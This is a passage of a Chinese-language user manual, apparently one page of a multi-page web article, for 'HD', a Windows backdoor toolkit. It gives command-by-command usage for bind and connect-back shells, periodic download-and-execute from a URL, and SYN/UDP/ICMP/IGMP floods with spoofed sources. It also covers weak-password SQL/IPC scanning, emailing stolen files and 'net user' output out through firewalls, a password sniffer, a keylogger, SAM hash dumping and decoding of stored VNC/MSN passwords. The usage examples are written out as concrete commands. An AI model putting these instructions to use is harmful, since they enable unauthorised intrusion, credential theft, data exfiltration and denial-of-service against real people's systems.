强大的后门工具：HD

 

参数解释:
a. hd -c -show

命令解释: 查看当前配置信息

b. hd -c -type       <0,1,2,3>

命令解释: 设置当前的后门任务模式
参数解释:
1. DoorType: 0.Disable 1.BindPort 2.ConnectBack 3.DownloadURL 4.HBbot
后门类型为: 0为无任务，1为监听端口，2为反连，3为自动下载URL文件并执行其中的命令，4为HBot模块。
2. 四个后门任务可同时工作。即同时有反连，监听端口，URL模块和HBot模块。

c. hd -c -id <DoorID>

命令解释: 设置后门的ID
参数解释:
1. <DoorID> 为后门的ID名称，小于16个字符。
2. DoorID 作用为区别后门，并可用于后门反连控制的自动控制条目中。

d. hd -c -port <BindPort>

命令解释: 设置后门的工作形式为监听端口
参数解释:
1. <BindPort> 为要设置的监听端口
2. 监听端口允许多次客户端的连接。

e. hd -c -url <DownloadURL> [SleepTime]

命令解释: 配置后门的工作形式为自动下载URL并执行其中的命令
参数解释:
1. <DownloadURL> 为要下载的URL文件路径，可带端口。文件内容可为多行Door Shell命令组成。
2. [SleepTime] 为下载一次的间隔时间，默认为60分钟，单位为分钟。

f. hd -c -cb        <ConnectHost> <Port> [SleepTime]

命令解释: 设置后门的工作形式为反连
参数解释:
1. <ConnectHost> 为反连的IP或者域名。
2. <Port> 为反连的端口，参数为1-65535的有效端口，细心设置可突破一般防火墙策略。
3. [SleepTime] 为反连一次的间隔时间，默认为60分钟，单位为分钟。

g. hd -c -time <SleepTime>

命令解释: 设置后门的间隔时间
参数解释:
1. <SleepTime> 为后门反连或者下载URL的间隔时间，单位为分钟。

h. hd -c -ip

命令解释: 设置后门Sniffer绑定的IP
参数解释:
1. <SnifferIP> 为机器的其中一个IP。不能使用127.0.0.1和0.0.0.0。
2. 此功能在机器有多个网卡的情况下使用。使Sniffer模块在外网的接口绑定才能保证后门的正常工作。
3. 默认为绑定机器的第一个IP。

i. hd -c -log       <logfile>

命令解释: 设置后门日志记录文件
参数解释:
1. <logfile> 为要保存的文件路径。
2. 默认记录文件为 hdsys.dat

j. hd -c -ddostype  <0,1,2,3,4>

命令解释: 设置后门拒绝服务攻击方式
参数解释:
1. DDoSType:       0.Disable 1.SYN      2.UDP         3.ICMP        4.IGMP
攻击类型为: 0. 无攻击任务 1. SYNFlood攻击 2. UDPFlood攻击 3. ICMPFlood攻击 4. IGMPFlood攻击
2. 只支持一个攻击任务，即为最后一次设置的攻击类型生效。
3. 更多拒绝服务使用帮助请看拒绝服务功能相关介绍。

k. hd -c -ddos      <TargetHost> <TargetPort> <ThreadNum>

命令解释: 设置后门绝服务攻击参数
参数解释:
1. <TargetHost> 为要攻击的目标IP或域名。
2. <TargetPort> 为要攻击的目标端口
3. <ThreadNum> 为攻击的线程。每个线程发包数为 <1000/秒 左右，自己根据网络状况设置。
4. 设置完后请用hd -c -ddostype 设置攻击的类型，以便攻击任务生效。
5. 如果攻击类型为ICMPFlood或者IGMPFlood时，端口可以任意设置。

l. hd -c -sockstype <0,1,2,3>

命令解释: 设置后门代理服务的方式
参数解释:
1. SocksType:      0.Disable 1.Bind     2.Connect     3.Listen
代理类型为: 0. 无代理任务 1. 监听端口代理 2. 反连代理 3.转发代理
2. 只支持一个代理任务，即为最后一次设置的代理类型生效。
3. 更多代理服务使用帮助请看代理功能相关介绍。

m. hd -c -bind      [ReBindIP] <BindPort>

命令解释: 设置后门代理服务为监听端口形式
参数解释:
1. [ReBindIP] 为设置为重用端口模式绑定的IP。不能为127.0.0.1。
2. <BindPort> 为代理监听的端口。

n. hd -c -connect   <ConnectIP> <ConnectPort>

命令解释: 设置后门代理服务为反连形式
参数解释:
1. <ConnectIP> 为要反连的IP。
2. <ConnectPort> 为要反连的端口。
3. 反连代理需要使用转发代理来接受反连才能正常工作。具体请看代理功能相关介绍。

o. hd -c -listen    <ConnectPort> <ListenPort>

命令解释: 设置后门代理服务为转发形式
参数解释:
1. <ConnectPort> 供反连代理连接的端口。
2. <ListenPort> 供SocksCap之类的代理客户端连接的端口。
3. 转发代理需要有反连代理连接才能正常工作。具体请看代理功能相关介绍。

5. 拒绝服务工具

使用命令: hd -d
帮助信息:
[Usage of DDoS Attack:]
-d <Target> <Port1,Port2,Port3...> [Option]
<Target>       Flooding Host IP|Hostname.
<Port1,...>    Flooding Host Port. Port Num must <10.

[Option:]
-a:AttackTime  The Time(minute) of Attack. Set 0 for Always. Default is 0.
-b:Packsize    The Size of Packet, for UDP/ICMP/IGMP Mode. Default is 1000.
Set 0 to Random.
-d:Delay       Delay of Send Packet, for UDP/ICMP/IGMP Mode. Default is 10ms.
-m:Mode        Attack Mode, Use SYN/UDP/ICMP/IGMP. Default is SYN.
-p:SourcePort  Set SourcePort, Default is Random.
-s:SourceIP    Set SourceIP, Default is Random.
-t:Thread      The Threads Num for Flooding, Max is 100, Default is 5.
参数解释:
a. <Target> 为要攻击的目标IP或者域名。
b. <Port1,...> 为要攻击的目标端口，用","号分隔，数量不要多于10个。
c. <AttackTime> 为将攻击的时间，单位为分钟。设为0为一直攻击，默认为0。
d. <PackSize> 为发送数据包的大小，攻击模式为UDP/ICMP/IGMP时有效，默认为1000，设为0为随机大小。
e. <Delay> 为每次发包的间隔延时，攻击模式为UDP/ICMP/IGMP时有效，单位为毫秒，默认10毫秒。
f. <Mode> 为攻击的模式，有SYN/UDP/ICMP/IGMP四种攻击模式，默认为SYN Flood。
g. <SourcePort> 为发包的源端口，SYN/UDP攻击模式有效。不推荐设置。
h. <SourceIP> 为发包的源IP，所有攻击模式有效。不推荐设置。
i. <Thread> 为攻击的线程，默认为５，最大线程为100。视网络状态设定。
j. DrDos 模式已经移除，不再支持。

使用示例:
a. 对192.168.0.1的21和80端口进行SYN攻击，使用命令为:
hd -ddos 192.168.0.1 21,80
b. 对www.xxx.com的80端口进行SYN攻击，线程为20，使用的命令为:
hd -ddos www.xxx.com 80 -t:20
c. 对192.168.0.1的4000端口进行UDP攻击，命令为:
hd -ddos 192.168.0.1 4000 /m:udp

6. 端口banner扫描器

使用命令: hd -f
帮助信息:
[Usage:]
-hbs <HostName|<StartIP[-EndIP]> [Options]

[Options:]
/b             Get Banner for many ports scan
/c             Check Web Version
/n             Note Port Open
/o             Scan Port Only
/w             Scan Web Version Only
/d <Delay>     TCP connect timeout, between 1-20, default is 5
/l <Logfile>   Log file name, default is hbs.txt
/m [Ports]     Scan many ports, default will scan 35 ports
/p <Port>      Scan port, default is 25
/s <String>    Scan sensitive string
/t <Thread>    Scan thread number, between 1-1000, default is 200
参数解释:
a. <HostName|<StartIP[-EndIP]> 为要扫描的IP地址或主机名，如果要扫描一段IP地址，格式为 开始IP-结束IP。
b. /b 为多端口扫描时获取banner。
c. /c 为扫描后检查Web版本信息。
d. /n 为当目标的端口打开时，在扫描记录文件里记录此IP等信息。
e. /o 为只扫描开放的端口，不取Banner。
f. /w 为只扫描Web版本信息。
g. /d <Delay> 为建立的TCP连接的延时，范围为1-20秒，默认为5秒。
h. /l <Logfile> 为记录扫描结果信息的日志文件。默认为hbs.txt。
i. /m [Ports] 为多端口扫描，默认为扫描内置常用的35个端口。
j. /p <Port> 为要扫描的端口，默认为25。
k. /s <String> 为扫描时记录Banner包含该字符串的IP。大小写敏感。
l. /t <Thread> 为扫描的线程，范围为1-1000，默认为200。建议ADSL用户设到100以下。
使用示例:
a. 如要扫描192.168.0.1-192.168.0.254这个段的25端口，用如下命令:
hd -hbs 192.168.0.1-192.168.0.254
b. 如果扫描192.168.0.1这个IP的25端口，扫描后检查Web版本信息，用如下命令:
hd -hbs 192.168.0.1 /c
c. 如果扫描192.168.0.1-192.168.0.254这个段的21端口，记录包含"Serv-U"的IP到servu.txt文件，用如下命令:
hd -hbs 192.168.0.1-192.168.0.254 /p 21 /s "Serv-U" /l servu.txt
d. 如果扫描192.168.0.1-192.168.0.254这个段的3389端口，用如下命令:
hd -hbs 192.168.0.1-192.168.0.254 /p 3389 /o
e. 如果扫描192.168.0.1-192.168.0.254这个段的80的Banner，用如下命令:
hd -hbs 192.168.0.1-192.168.0.254 /w
f. 如果要扫描www.n0p.org的常用端口并获取Banner，用如下命令:
hd -hbs www.n0p.org /m /b
g. 如果要扫描www.n0.org的多个端口，用如下命令:
hd -hbs www.n0p.org /m 21,23,25,80-5000,8080
即端口用","号分隔，端口范围用"-"号分隔。

7. 命令行Ping/Name/SQL/IPC扫描器

使用命令: hd -g
帮助信息:
[Usage:]
-hscan <HostName|<StartIP[-EndIP]> [Options]

[Options:]
/a             Scan All, default on
/c             Check host state, Ping first
/f             Faster Scan
/i             IPC User Scan
/n             Name Scan
/p             Ping Scan
/s             SQL User Scan
/d <Delay>     Set timeout, between 1-20, default is 5
/l <Logfile>   Log file name, default is hscan.txt
/t <Thread>    Scan thread number, between 1-1000, default is 200

参数解释:
a. <HostName|<StartIP[-EndIP]> 为要扫描的IP地址或主机名，如果要扫描一段IP地址，格式为 开始IP-结束IP。
b. /a 为扫描所有项目，默认打开。
c. /c 为先ping再扫描。
d. /f 为快速扫描(只猜空密码和与用户名有关的密码)。
e. /i 进行IPC扫描。
f. /n 进行Name扫描。
g. /p 进行Ping扫描。
h. /s 进行SQL扫描。
i. /d <Delay> 为建立的TCP连接的延时，范围为1-20秒，默认为5秒。
j. /l <Logfile> 为记录扫描结果信息的日志文件。默认为hbs.txt。
k. /t <Thread> 为扫描的线程，范围为1-1000，默认为200。建议ADSL用户设到100以下。

使用示例:
a. 如要要扫描192.168.0.1的所有项目，用如下命令:
hd -hscan 192.168.0.1
b. 如果要扫描192.168.0.1-192.168.0.254的SQL和IPC简单密码，用如下命令:
hd -hscan 192.168.0.1-192.168.0.254 /s /i
c. 如果要扫描192.168.0.1-192.168.0.254的活动机器的SQL和IPC简单密码，用如下命令:
hd -hscan 192.168.0.1-192.168.0.254 /s /i /c

8. 命令行邮件发送器

使用命令: hd -m
帮助信息:
Usage(1.3b1):-m [-switch] <MailTo> <AttachedFile> [Proxy IP] [Proxy Port]

switch list:
-s      xxx@xxx.com  user define from header
-n      do not attach file
-c      "route print"  user define command
-h      these info
参数解释:
a. <MailTo> 为收信的信箱地址。
b. <AttachedFile> 为要带的附件，该功能主要是为从内网穿透防火墙传文件到外网而写。
c. [Proxy IP] 为支持邮件转发的SMTP邮件服务器IP地址，或者做了到SMTP邮件服务器的SMTP端口的端口转发的IP地址。
d. [Proxy Port] 为支持邮件转发的SMTP邮件服务器SMTP端口，或者做了到SMTP邮件服务器的SMTP端口的端口转发的转发端口。
e. -s xxx@xxx.com 为定义发件人，有的邮件服务器有反垃圾邮件或需要验证发件人的，用这个定义，默认为随机产生地址。
f. -n 如果不带附件，用这选项。
g. -c "command" 为邮件发送的内容指定为该命令的执行结果，默认为"route print"的执行结果。
h. -h 显示帮助信息。
使用示例:
a. 如果给lion@cnhonker.net 发送 xxx.rar，使用命令为：
hd -m lion@cnhonker.net xxx.rar
b. 如果给 lion@cnhonker.net 发送 xxx.rar，通过 192.168.0.1的99端口进行转发，使用命令为：
hd -m lion@cnhonker.net xxx.rar 192.168.0.1 99
c. 如果给lion@cnhonker.net发送"net user"命令的执行结果而不带附件，使用命令为：
hd -m -n -c "net user" lion@cnhonker.net

9. 包转发功能

使用命令: hd -p
帮助信息:
[Usage of Packet Transmit:]
-p -listen ConnectPort TransmitPort
-p -tran   ConnectPort TransmitHost TransmitPort
-p -slave  ConnectHost ConnectPort TransmitHost TransmitPort

[Option:]
-log logfile
参数解释:
1. -listen 监听功能。支持 本机监听端口 <-> 本机转发端口 的转发。
2. -tran 简单端口转发功能。支持 本机端口 <-> 转发机器:转发端口 的转发。
3. -slave 双向转发功能。支持 监听机器:监听端口 <-> 转发机器:转发端口 的转发。
4. -log 支持日志记录。可以记录转发时的数据包内容。

10. Socks5功能

使用命令: hd -s
帮助信息:
[Usage of Socks5 Proxy:]
-s -bind [ReBindIP] [BindPort]              Default:ALL 8009
-s -connect ConnectHost [ConnectPort]       Default:80
-s -listen [ConnectPort] [ListenPort]       Default:80 8009

[Option:]
-log logfile
参数解释:
1. -bind 监听功能。为创建一个端口进行Socks5服务，支持端口重定向。
2. -connect 反连Socks5功能。
3. -listen 双向转发功能。为反连Socks5连接的端口。
4. -log 支持日志记录。可以记录数据包内容。
使用示例:
1. 端口重用Socks5:
hd -s -bind 10.10.10.222 80
注: 这里的IP不要使用127.0.0.1，而应该使用一个网卡接口的IP。
2. 反连Socks5示例:
a. 在你接受反连的那台机器运行:
hd -s -listen 80 8009
b. 在反连那台机器运行:
hd -s -connect 接受反连IP 80
如: hd -s -connect 10.10.10.222 80
c. 使用SocksCap之类的连接接受反连IP机器的ListenPort即可。 上例为8009。
如果连接Listen服务器不成功，Connect 10分钟后才会连接第二次。

11. 命令行Sniffer帮助信息

使用命令: hd -x
帮助信息:
[Usage of Sniffer:]
-x [Option]
[Option]
/h          Show Help
/t          Output TCP  Packets
/u          Output UDP  Packets
/i          Output ICMP Packets
/p          Decode Packets (default OFF)
/v          Output Packets Info
/l          Output Password Strings (default ON, save to:hdsys.dat)
/c          Close Console (Hide Mode)
/b:BindIP   Sniffer Bind IP (default ALL)
/f:FromIP   Output Packets FromIp=fromIP (default ALL)
/d:DestIP   Output Packets DestIp=destIP (default ALL)
/s:String   Output Packets Include sensitive String(TCP only)
/o:Port     Output Packets from or to the port(ICMP is TYPE)
参数解释:

12. 其他功能

使用命令: hd -o
帮助信息:
[Usage of Tools:]
-bind           Bind Shell                   // 监听一个Shell
-client         Backdoor Client              // 后门客户端功能
-config         Config Parameter             // 后门配置功能
-connect        ConnectBack Shell            // 反连一个Shell
-ddos           DDoS Attack                  // 拒绝服务功能
-enum           Enum+                        // Enum功能
-enumhost       Enum Network Hosts           // 列举网络机器
-findpass       Find User Password           // 查找密码
-fport          Port to File and Process     // 端口对应进程
-hash           HBot PassHash                // 产生HBot的登陆hash
-hbs            Port Banner Scanner          // 命令行端口banner扫描器
-hget           Get HTTP/FTP File            // 命令行下载文件
-hmb            Domain MX Banner Finder      // Domain MX Banner获取器
-hscan          Ping/Name/SQL/IPC Scanner    // 命令行Ping/Name/SQL/IPC扫描器
-keylog         Keyboard Log                 // 命令行键盘记录器
-logoff         Logoff Windows               // 注销系统
-msn            MSN Password Decode          // MSN注册表密码解码
-packet         Packet Transmit              // 包转发功能
-pcanywhere     Pcanywhere Password File Decode // pcanywhere 密码文件解码
-pskill         Kill a Process               // 杀掉进程
-pslist         List Process                 // 查看进程
-pwdump         SAM Password Hash Dumper     // 注册表SAM密码HASH获取器
-reboot         Reboot System                // 重启系统
-safedel        Safe Delete File             // 安全删除文件功能
-server         Create a Server              // 创建一个后门Server
-service        Services Operate             // 服务操作功能
-shutdown       Shutdown System              // 关闭系统
-smail          Command Line SendMail        // 命令行邮件发送器
-sniffer        Command Line Sniffer         // 命令行Sniffer
-socks5         Socks5 Proxy                 // Socks5代理功能
-su             Like UNIX su Tool
-sysinfo        System Info                  // 显示系统信息
-telnet         Telnet to Target             // Telnet功能
-vnc            VNC Password Decode          // VNC 注册表密码解码

四. 后门内置shell命令使用方法介绍 (后门Shell里运行命令将得到详细的在线帮助)

1. 后门管理

a. HELP/H/MAN/?

命令解释: 显示后门帮助
帮助信息:
[Help Message:]

后门管理
==================================================
?/H/HELP/MAN      Show this Message
CLIENT/HC         Backdoor Client
CONFIG            Config the Parameter
EXIT              Exit Shell
ID                Show Door ID
KICK              Kick Shell
NOP/NOOP          Keep Active
RELOAD            Reload Config Data
REMOVE            Remove this Program
SHOW              Show Config Data
UPDATE            Update Backdoor
VER/VERSION       Show Version Message
WHO/ONLINE        List Client

文件目录操作
--------------------------------------------------
CD                Change Directory
COPY/CP           Copy file or Directory
DEL/RM/RD         Delete file or Directory
DIR/LS/LIST       List file and Directory
FIND              Find file
MOVE/MV           Move file or Direcotry
MD/MKDIR          Create Directory
PWD               Get Current Dirctory
REN/RENNAME       Renname file or Directory
SDEL/SAFEDEL      Safe Delete File or Direcotry
TYPE/CAT          Type text file

执行程序操作
--------------------------------------------------
CMD/DOS/SHELL     Switch to MS-DOS Mode
EXE               CreateProcess run file
EXEC              Winexec run file
OPEN              ShellExecute run file
SYSTEM            System run file

系统操作
--------------------------------------------------
DATE              Show Date and Time
LOCK/UNLOCK       Lock/Unlock the mouse
LOGOFF            Logoff System
REBOOT            Reboot System
SHUTDOWN          Shutdown System
SYS/INFO          View System info

后门Shell操作
--------------------------------------------------
BIND              Bind Shell
CONNECT           ConnectBack Shell
SERVER            Create a Server
TELNET/LOGIN      Telnet to Target

代理操作
--------------------------------------------------
KILLPROXY/KP      Kill a TCP Proxy
LISTPROXY/LP      List all TCP Proxy
PROXY/HTRAN       Create a TCP Proxy

拒绝服务操作
--------------------------------------------------
DDOS/HGOD         DDoS Attack
KILLDDOS/KD       Kill a DDoS Attack
LISTDDOS/LD       List all DDoS Attack

附加功能操作
--------------------------------------------------
CLIP              Get Clipboard Text
FINDPASS          Find User Password
FPORT             Port to Process
GET/PUT           Get or Put file.(Please use Client)
HASH              HBot PassHash
HBOT              HBot Cortrol
HBS               Port Banner Scanner
HGET              Get the file from HTTP or FTP
HMB               Domain MX Banner Finder
I3389/S3389       Install Termsrv, Show & Set Port
KEYLOG/STOPK      Start/Stop Keyboard Log
PCANYWHERE        PCAnywhere Password file Decode
PSKILL/KILL       Kill the Process
PSLIST/PS         List all Process
PWDUMP            SAM Password Hash Dumper
SCREEN            Capture Screen
SERVICE           All Service Operate
SMAIL             Send a Mail
SNIFFER/STOPS     Start/Stop Password Sniffer
SU                Like UNIX su Tool
VNC               VNC Password Decode
==================================================

b. CLIENT/HC

命令解释: 后门客户端功能
帮助信息:
[Usage of Door Client:]
client <hosts.txt|TargetIP> <Command> [Option]
client -shell [Sniffer BindIP]

[Command:]
Please See the BackDoor Shell Help Message!
[Option:]
-i:SEQ         Set the BackDoor IP Packet SEQ. Default is 10101.
-l:SourcePort  Use for TCP/UDP Send Mode. Default is 1025.
-m:SendMode    Set the TCP/UDP/ICMP Send Packet Mode. Default is ICMP.
-p:TargetPort  Use for TCP/UDP Send Mode. Default is 80.
-s:SourceIP    Set the Source IP. Default is your Real IP.
-t:ICMPType    Set the ICMP Type. Default is 8(ICMP_ECHO).
[Example:]
client 192.168.0.1 ""bind 99""
client 192.168.0.1 ""bind 99"" -m:tcp -l:1025 -p:80 -s:192.168.0.2
client 192.168.0.1 ""connect 192.168.0.2 53""
client hosts.txt   ""hgod 192.168.0.2 80""

c. CONFIG

命令解释: 后门配置
帮助信息:
[Usage of Config:]
config -show
config -type      <0,1,2,3,4>
config -id        <DoorID>
config -port      <BindPort>
config -url       <DownloadURL> [SleepTime]
config -cb        <ConnectHost> <Port> [SleepTime]
config -hbot      <Server> <Port> <Channel> [ChannelPass]
config -time      <SleepTime>
config -ip        <SnifferIP>
config -log       <logfile>
config -ddostype  <0,1,2,3,4>
config -ddos      <TargetHost> <TargetPort> <ThreadNum>
config -sockstype <0,1,2,3>
config -bind      [ReBindIP] <BindPort>
config -connect   <ConnectHost> <ConnectPort>
config -listen    <ConnectPort> <ListenPort>
--------------------------------------------------
DoorType:       0.Disable 1.BindPort 2.ConnectBack 3.DownloadURL 4.HBot
DDoSType:       0.Disable 1.SYN      2.UDP         3.ICMP        4.IGMP
SocksType:      0.Disable 1.Bind     2.Connect     3.Listen
d. EXIT

上一页  [1] [2] [3] [4] [5] 下一页